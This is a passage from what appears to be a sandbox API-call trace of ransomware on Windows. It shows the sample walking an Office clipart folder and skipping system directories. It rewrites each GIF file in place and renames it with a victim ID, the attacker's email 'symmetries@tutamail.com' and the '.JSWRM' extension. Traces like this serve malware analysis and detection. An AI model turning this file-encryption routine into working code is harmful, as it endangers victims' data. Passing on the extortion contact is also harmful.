(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0073.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0073.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0073.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0073.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0073.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.609] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0073.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.610] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00154_.GIF", cAlternateFileName="")) returned 1 [0073.610] lstrcmpiW (lpString1="AG00154_.GIF", lpString2=".") returned 1 [0073.610] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="..") returned 1 [0073.610] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="...") returned 1 [0073.610] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="windows") returned -1 [0073.611] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="recovery") returned -1 [0073.611] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="perflogs") returned -1 [0073.611] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="documents and settings") returned -1 [0073.611] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.611] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="system volume information") returned -1 [0073.611] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="msocache") returned -1 [0073.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0073.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00154_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00154_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00154_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0073.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0073.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00154_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00154_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00154_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0073.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.611] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5315) returned 1 [0073.611] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14c0) returned 0x24c1d0 [0073.612] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x14c0, lpOverlapped=0x0) returned 1 [0073.613] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.614] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x14c0, lpOverlapped=0x0) returned 1 [0073.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.614] CloseHandle (hObject=0x460) returned 1 [0073.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0073.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0073.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0073.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0073.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0073.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0073.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.615] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00157_.GIF", cAlternateFileName="")) returned 1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2=".") returned 1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="..") returned 1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="...") returned 1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="windows") returned -1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="recovery") returned -1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="perflogs") returned -1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="documents and settings") returned -1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="system volume information") returned -1 [0073.615] lstrcmpiW (lpString1="AG00157_.GIF", lpString2="msocache") returned -1 [0073.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0073.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00157_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00157_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00157_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0073.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0073.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00157_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00157_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00157_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0073.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.616] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4955) returned 1 [0073.616] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1350) returned 0x24c1d0 [0073.617] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1350, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1350, lpOverlapped=0x0) returned 1 [0073.618] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.618] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1350, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1350, lpOverlapped=0x0) returned 1 [0073.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.618] CloseHandle (hObject=0x460) returned 1 [0073.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0073.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0073.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0073.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0073.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0073.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0073.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.619] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00158_.GIF", cAlternateFileName="")) returned 1 [0073.619] lstrcmpiW (lpString1="AG00158_.GIF", lpString2=".") returned 1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="..") returned 1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="...") returned 1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="windows") returned -1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="recovery") returned -1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="perflogs") returned -1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="documents and settings") returned -1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="system volume information") returned -1 [0073.620] lstrcmpiW (lpString1="AG00158_.GIF", lpString2="msocache") returned -1 [0073.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0073.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00158_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00158_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00158_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0073.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0073.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00158_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00158_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00158_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0073.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.620] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5030) returned 1 [0073.620] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13a0) returned 0x24c1d0 [0073.621] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x13a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x13a0, lpOverlapped=0x0) returned 1 [0073.677] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.677] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x13a0, lpOverlapped=0x0) returned 1 [0073.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.677] CloseHandle (hObject=0x460) returned 1 [0073.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0073.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0073.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0073.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0073.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0073.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.678] HeapFree (in: 